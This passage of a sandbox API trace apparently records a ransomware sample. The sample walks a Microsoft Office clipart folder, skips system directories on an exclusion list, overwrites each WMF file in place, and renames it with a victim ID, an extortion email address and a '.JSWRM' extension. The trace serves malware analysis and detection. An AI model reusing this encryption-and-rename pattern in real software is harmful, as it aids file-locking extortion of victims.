[0075.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0075.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.822] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CG1606.WMF", cAlternateFileName="")) returned 1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2=".") returned 1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="..") returned 1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="...") returned 1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="windows") returned -1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="recovery") returned -1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="perflogs") returned -1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="documents and settings") returned -1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="system volume information") returned -1 [0075.822] lstrcmpiW (lpString1="CG1606.WMF", lpString2="msocache") returned -1 [0075.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CG1606.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CG1606.WMF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CG1606.WMF", lpUsedDefaultChar=0x0) returned 10 [0075.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CG1606.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CG1606.WMF", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CG1606.WMF", lpUsedDefaultChar=0x0) returned 10 [0075.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0075.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.823] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3564) returned 1 [0075.823] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde0) returned 0x24c1d0 [0075.823] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0075.825] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.825] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.825] CloseHandle (hObject=0x460) returned 1 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0075.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0075.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0075.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.826] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CLASSIC1.WMF", cAlternateFileName="")) returned 1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2=".") returned 1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="..") returned 1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="...") returned 1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="windows") returned -1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="recovery") returned -1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="perflogs") returned -1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="documents and settings") returned -1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="system volume information") returned -1 [0075.826] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="msocache") returned -1 [0075.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC1.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC1.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLASSIC1.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC1.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC1.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLASSIC1.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.827] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2422) returned 1 [0075.827] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x970) returned 0x23fc98 [0075.827] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x970, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x970, lpOverlapped=0x0) returned 1 [0075.830] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.830] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x970, lpOverlapped=0x0) returned 1 [0075.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.830] CloseHandle (hObject=0x460) returned 1 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0075.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0075.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0075.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0075.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.831] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CLASSIC2.WMF", cAlternateFileName="")) returned 1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2=".") returned 1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="..") returned 1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="...") returned 1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="windows") returned -1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="recovery") returned -1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="perflogs") returned -1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="documents and settings") returned -1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="system volume information") returned -1 [0075.831] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="msocache") returned -1 [0075.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0075.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC2.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC2.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLASSIC2.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0075.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC2.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLASSIC2.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLASSIC2.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.832] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2262) returned 1 [0075.832] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8d0) returned 0x23fc98 [0075.832] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0075.838] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.838] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0075.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.838] CloseHandle (hObject=0x460) returned 1 [0075.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0075.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0075.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0075.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.839] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CLIP.WMF", cAlternateFileName="")) returned 1 [0075.839] lstrcmpiW (lpString1="CLIP.WMF", lpString2=".") returned 1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="..") returned 1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="...") returned 1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="windows") returned -1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="recovery") returned -1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="perflogs") returned -1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="documents and settings") returned -1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="system volume information") returned -1 [0075.840] lstrcmpiW (lpString1="CLIP.WMF", lpString2="msocache") returned -1 [0075.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 